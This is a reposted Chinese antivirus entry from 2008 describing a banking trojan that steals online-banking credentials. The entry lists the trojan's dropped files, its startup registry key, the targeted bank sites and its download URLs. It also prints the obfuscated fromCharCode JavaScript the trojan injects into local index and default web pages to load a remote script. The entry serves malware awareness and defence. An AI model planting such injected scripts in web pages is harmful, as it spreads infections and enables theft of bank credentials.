当前位置: 王朝网络 >> system >> Win32.Troj.Dropper.c.1261243

Win32.Troj.Dropper.c.1261243

王朝system·作者佚名 2008-08-14

窄屏简体版字體: 小|中|大|超大

病毒名称(中文):

病毒别名:

威胁级别:

★☆☆☆☆

病毒类型:

木马程序

病毒长度:

1261243

影响系统:

WinNTWin2000WinXPWin2003

病毒行为:

这是一个会盗取用户信息的木马程序。病毒运行后，将隐蔽安装到用户计算机，并增加启动项以自启动。病毒通过运行一个隐藏的SoundMan.exe进程，监控用户是否打开了

指定的网上银行网址，假如是则监控用户鼠标状态，盗取用户银行帐号密码等信息，并发送至黑客邮箱。请广大使用网上银行的用户注重目录下是否存在该病毒文件，以便预防。

另外，该病毒还会修改硬盘中文件名为"index.*"和"default.*"的网页文件，插入病毒代码，并下载大量隐蔽软件安装至用户电脑，使用户计算机安全受到危胁。

1.生成文件

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\dll.fnr

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\eAPI.fne

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\eCompress.fne

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\eImgConverter.fne

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\eLIB.fne

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\HideProc.dll

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\internet.fne

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\krnln.fnr

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\mon

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\moz

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\Nhook.dll

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\shell.fne

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\SOUNDMAN.EXE

2.注册表项

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunSoundNan"%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\SOUNDMAN.EXE"

3.修改硬盘中文件为"index.*"和"default.*"的网页文件

index.asp

index.jsp

index.php

index.htm

index.html

default.asp

default.jsp

default.php

default.htm

default.html

并插入以下脚本

t="60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,99,115,46,99,115,107,105,99,107,46,99,110,47,99,115,47,115,99,46,106,115,62,60,47,115,99,114,105,112,116,62"

t=eval("String.fromCharCode("+t+")");

document.write(t);

4.盗取以下网上银行用户信息，并发送至黑客163.com邮箱

招商银行网上支付中心

招商银行一网通-个人银行大众版hxxps://pbsz.ebank.cmbchina.com

中国农业银行hxxp://www.abchina.com

中信银行网上银行hxxps://personal.bank.ecitic.com:444

公司银行介绍_中信金融网hxxps://homebank.citicib.com.cn:91/

浦东发展银行hxxps://ebanks.spdb.com.cn

5.尝试连接远程服务器，下载大量隐蔽软件安装至用户计算机

hxxp://bbs.xxxx.com/pic/logo6.jpg

hxxp://cs.csxxxx.cn/cs/2.jpg